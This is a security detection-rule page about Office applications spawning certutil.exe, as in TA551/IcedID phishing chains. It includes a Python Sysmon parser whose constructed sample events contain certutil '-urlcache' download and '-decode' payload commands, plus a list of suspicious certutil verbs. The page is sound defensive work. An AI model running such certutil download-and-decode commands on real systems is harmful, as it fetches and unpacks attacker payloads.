
Summary
This detection rule identifies Microsoft Office products spawning `certutil.exe`, a legitimate Windows binary that is commonly abused to download payloads from remote URLs. A `certutil.exe` child process under an Office application is a strong indicator of compromise: the threat actor TA551 and malware such as IcedID have used this technique, typically following a phishing attachment, to fetch and execute a payload that leads to unauthorized access, data exfiltration, or further system compromise. The rule uses telemetry such as Sysmon event logs and Windows event logs to track parent/child process relationships and command-line executions. This analytic has been deprecated in favor of a more general detection rule, but it remains useful for highlighting the malicious use of a legitimate tool in the context of Office products; any detection should be investigated and responded to promptly.
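The parent/child check described above, run over a few constructed Sysmon Event ID 1 records, as an added example (not the rule's own search logic). The field names `Image`, `ParentImage`, `OriginalFileName` and `CommandLine` are real Sysmon Event ID 1 fields; the `Key: Value` text rendering, the list of Office executables and the sample events are assumptions made for this example. It goes slightly beyond the rule as summarized: it also matches on `OriginalFileName` so a copied or renamed `certutil.exe` is still caught, and it pulls out the download/decode verbs and any URL from the command line to give the analyst something to pivot on.

```python
"""Flag Microsoft Office processes spawning certutil.exe in Sysmon Event ID 1 data.

Added example for this page; not the detection rule's own search. The Sysmon
field names are real; the text rendering, the Office list and the sample
events below are constructed for the example.
"""
import re
from dataclasses import dataclass

# Parent processes treated as "Office products" (assumed list for the example).
OFFICE_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "msaccess.exe", "mspub.exe", "visio.exe", "onenote.exe",
}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# certutil verbs that indicate download or payload decoding rather than certificate admin.
SUSPICIOUS_VERBS = ("urlcache", "decode", "encode", "verifyctl")


@dataclass
class Finding:
    parent: str
    image: str
    renamed: bool   # on-disk name is not certutil.exe but OriginalFileName says it is
    verbs: list
    urls: list


def parse_event(text):
    """Parse 'Key: Value' lines (a text rendering of one Sysmon EID 1 event)."""
    fields = {}
    for line in text.strip().splitlines():
        key, sep, value = line.partition(":")  # first colon only; paths keep theirs
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(fields):
    """Return a Finding when an Office parent spawned certutil, else None."""
    parent = basename(fields.get("ParentImage", ""))
    if parent not in OFFICE_PARENTS:
        return None
    image = basename(fields.get("Image", ""))
    # Match on OriginalFileName too, so a copied/renamed certutil is still caught.
    original = fields.get("OriginalFileName", "").lower()
    if image != "certutil.exe" and original != "certutil.exe":
        return None
    cmd = fields.get("CommandLine", "")
    verbs = [v for v in SUSPICIOUS_VERBS
             if re.search(r"[-/]" + v + r"\b", cmd, re.IGNORECASE)]
    return Finding(parent=parent, image=image, renamed=(image != "certutil.exe"),
                   verbs=verbs, urls=URL_RE.findall(cmd))


def scan(events):
    """Evaluate every rendered event and keep only the hits."""
    return [f for f in (evaluate(parse_event(e)) for e in events) if f is not None]


# Constructed sample events: two true positives, two benign records.
SAMPLE_EVENTS = [
    # 1: maldoc macro in Word pulls a payload with certutil (constructed)
    """Image: C:\\Windows\\System32\\certutil.exe
CommandLine: certutil.exe -urlcache -split -f http://198.51.100.7/inv.dat C:\\Users\\Public\\inv.dat
OriginalFileName: CertUtil.exe
ParentImage: C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE""",
    # 2: renamed copy of certutil launched from Excel, caught via OriginalFileName
    """Image: C:\\Users\\Public\\ct.exe
CommandLine: ct.exe -decode C:\\Users\\Public\\p.txt C:\\Users\\Public\\p.exe
OriginalFileName: CertUtil.exe
ParentImage: C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE""",
    # 3: administrator using certutil from a console: not an Office parent
    """Image: C:\\Windows\\System32\\certutil.exe
CommandLine: certutil -store My
OriginalFileName: CertUtil.exe
ParentImage: C:\\Windows\\System32\\cmd.exe""",
    # 4: Office spawning a different child: outside this rule's scope
    """Image: C:\\Windows\\System32\\cmd.exe
CommandLine: cmd /c echo hi
OriginalFileName: Cmd.Exe
ParentImage: C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE""",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Running the block prints two findings: the Word-spawned `-urlcache` download with its URL, and the Excel-spawned renamed binary flagged as `renamed=True` with the `decode` verb. The console-launched `certutil -store` and the Word-spawned `cmd.exe` are not reported, which is the point of keying on the Office parent rather than on `certutil.exe` alone.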
Categories
- Endpoint
- Windows
Data Sources
- Sysmon event logs
- Windows event logs
ATT&CK Techniques
- T1105
- T1566
- T1566.001
Created: 2025-01-13